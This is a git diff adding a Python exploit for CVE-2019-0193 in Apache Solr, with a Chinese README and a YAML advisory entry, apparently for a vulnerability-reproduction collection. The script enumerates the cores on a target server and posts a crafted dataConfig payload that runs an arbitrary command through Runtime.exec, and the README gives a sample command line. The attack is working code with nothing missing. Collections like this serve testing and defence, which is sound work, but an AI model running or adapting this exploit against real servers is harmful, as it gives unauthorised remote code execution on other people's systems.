diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
new file mode 100644
index 0000000000000000000000000000000000000000..bf16b9feb546fd306ad22dfe6a47d7bfee252920
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
@@ -0,0 +1,91 @@
+import requests
+import json
+import sys
+
+
+banner = '''
+   _______      ________    ___   ___  __  ___          ___  __  ___ ____  
+  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \        / _ \/_ |/ _ \___ \ 
+ | |     \ \  / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
+ | |      \ \/ / |  __|______/ /| | | || |\__, |______| | | || |\__, |__ < 
+ | |____   \  /  | |____    / /_| |_| || |  / /       | |_| || |  / /___) |
+  \_____|   \/   |______|  |____|\___/ |_| /_/         \___/ |_| /_/|____/ 
+                                                                           
+                          python By jas502n                                              
+'''
+print banner
+
+def admin_cores(url, cmd):
+    core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
+    r = requests.get(url=core_selector_url)
+    json_strs = json.loads(r.text)
+    if r.status_code ==200 and "responseHeader" in r.text:
+        print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
+        for core_selector in json_strs['status']:
+            jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
+            print '\n>>>>The Core Name = %s' % jas502n_Core_Name
+            show_config(url,jas502n_Core_Name)
+            get_config_name(url,jas502n_Core_Name)
+            URLDataSource_Poc(url,jas502n_Core_Name,cmd)
+            
+    else:
+        print "No core_selector Exit!"
+    
+
+
+        
+def show_config(url,jas502n_Core_Name):
+    config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
+    r1 = requests.get(config_url)
+    
+    if r1.status_code ==200 and 'dataConfig' in r1.text:
+        print ">> config_url= %s"% config_url
+        print ">%s dataConfig Exit!" % jas502n_Core_Name
+    else:
+        print "dataConfig No Exit!"
+
+
+
+def get_config_name(url,jas502n_Core_Name):
+    get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
+    r2 = requests.get(get_config_url)
+    if r2.status_code ==200 and 'config' in r2.text:
+        print ">> get_config_url= %s" % get_config_url
+        r2_json = json.loads(r2.text)
+        r2_str = r2_json['initArgs']
+        
+        print '>get_config_name= %s' % r2_str[1][1]
+        
+    else:
+        print "Core Config Name No Exit!"
+
+
+
+def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
+    debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
+    payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
+    headers = {
+    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+    "Accept": "application/json, text/plain, */*",
+    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+    "Accept-Encoding":"gzip, deflate",
+    "Content-type":"application/x-www-form-urlencoded",
+    "X-Requested-With":"XMLHttpRequest",
+    "Referer":"http://%s/solr/" % url
+
+    }
+    r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
+    print ">>>>> debug_model_url= %s" % debug_model_url
+    if r3.status_code ==200 and 'Requests' in r3.text:
+
+        print "Send Poc Success!"
+    else:
+        print "No Send Poc Success!"
+        print r3.text
+
+
+
+if __name__ == '__main__':
+    cmd = sys.argv[2]
+    url = sys.argv[1]
+    admin_cores(url,cmd)
\ No newline at end of file
diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..a19fa0a1ac94ab8a12c5b40c2811c3dd802643ca
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/README.md
@@ -0,0 +1,9 @@
+# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
+
+## 描述
+
+Apache Solr是美国阿帕奇（Apache）软件基金会的一款基于Lucene（一款全文搜索引擎）的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块，可从数据库（通过JDBC）、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定，也可以从用户请求的dataConfig中获取。
+
+## 用法
+
+```python CVE-2019-0193.py http://192.168.2.18:8983 "calc"```
\ No newline at end of file
diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..fd16aeb2017bd13817e20c9490e8e965363d9cb3
--- /dev/null
+++ b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml
@@ -0,0 +1,39 @@
+id: CVE-2019-0193
+source:- https://github.com/jas502n/CVE-2019-0193
+info:
+  name: Apache Solr是美国阿帕奇（Apache）基金会的一款基于Lucene（一款全文搜索引擎）的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+  severity: high
+  description:
+    在Apache Solr中，DataImportHandler是一个可选但常用的模块，用于从数据库和其他源中提取数据，它具有一个功能，其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本，因此该参数存在安全风险。从Solr的8.2.0版开始，使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。
+  scope-of-influence:
+    Apache Solr < 8.2.0
+  reference:
+    - https://issues.apache.org/jira/browse/SOLR-13669
+    - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E	
+    - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E	
+    - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E	
+    - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E	
+    - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E	
+    - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E	
+    - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E	
+    - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E	
+    - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html	
+    - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2019-0193
+    cnvd-id: None
+    kve-id: None
+  tags: 对生成代码的控制不恰当，代码注入
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index cae1e168f77fb28a2363540f49132effef2a42d6..325bf7a91d76d131070e60f45c7fa60deda790f6 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -16,6 +16,7 @@ cve:
     - CVE-2021-44228
   apache-solr:
     - CVE-2021-27905
+    - CVE-2019-0193
   apache-tomcat:
     - CVE-2022-29885
     - CVE-2020-9484